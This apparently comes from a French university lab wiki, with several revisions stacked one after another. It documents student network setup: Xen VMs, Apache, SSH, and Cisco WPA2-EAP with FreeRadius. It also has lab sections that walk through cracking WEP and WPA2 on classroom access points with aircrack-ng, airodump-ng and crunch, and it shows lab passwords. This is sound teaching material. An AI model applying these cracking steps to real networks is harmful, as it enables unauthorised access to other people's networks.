xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise ne place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:23:50Z

Jcabrald : /* Sécurisation Wifi par WPA2-EAP */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise ne place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupea

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:17:56Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise ne place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

